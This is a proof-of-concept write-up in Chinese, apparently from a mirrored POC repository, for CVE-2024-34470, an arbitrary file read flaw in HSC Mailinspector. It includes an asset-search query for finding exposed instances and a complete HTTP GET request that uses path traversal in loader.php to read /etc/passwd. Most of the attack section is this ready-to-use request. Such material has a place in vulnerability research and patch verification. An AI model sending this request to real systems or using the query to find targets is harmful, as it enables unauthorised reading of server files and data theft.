admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-11-06 02:46:33 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/HSC/HSCMailinspectorloader存在任意文件读取漏洞(CVE-2024-34470).md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

31 lines
1.4 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# HSC Mailinspector loader存在任意文件读取漏洞(CVE-2024-34470)
# 一、漏洞简介
HSC Mailinspector是一款邮件安全解决方案旨在保护企业邮件系统免受垃圾邮件、恶意软件和其他类型的网络威胁。该解决方案可以检测和过滤垃圾邮件、病毒、木马和其他类型的恶意软件并提供详细的报告和日志记录以帮助管理员跟踪和分析邮件流量。 HSC Mailinspector loader接口处存在任意文件读取漏洞(CVE-2024-34470),恶意攻击者可能利用该漏洞读取服务器上的敏感文件,例如客户记录、财务数据或源代码,导致数据泄露。
# 二、影响版本
+ HSC Mailinspector
# 三、资产测绘
```plain
body="mailinspector/public"
```
![1717748023362-4f8c75dc-fe58-44aa-91b5-bef491d33e17.png](./img/dqMWRZ4U8g1HnlWV/1717748023362-4f8c75dc-fe58-44aa-91b5-bef491d33e17-597820.png)
# 四、漏洞复现
```plain
GET /mailinspector/public/loader.php?path=../../../../../../../etc/passwd HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
```
![1717747998713-627b906c-51cb-46d6-8f79-b66ba599ccbe.png](./img/dqMWRZ4U8g1HnlWV/1717747998713-627b906c-51cb-46d6-8f79-b66ba599ccbe-035461.png)
> 更新: 2024-06-11 10:34:10
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/pnb6lpu1pdfurixs>
Reference in New Issue View Git Blame Copy Permalink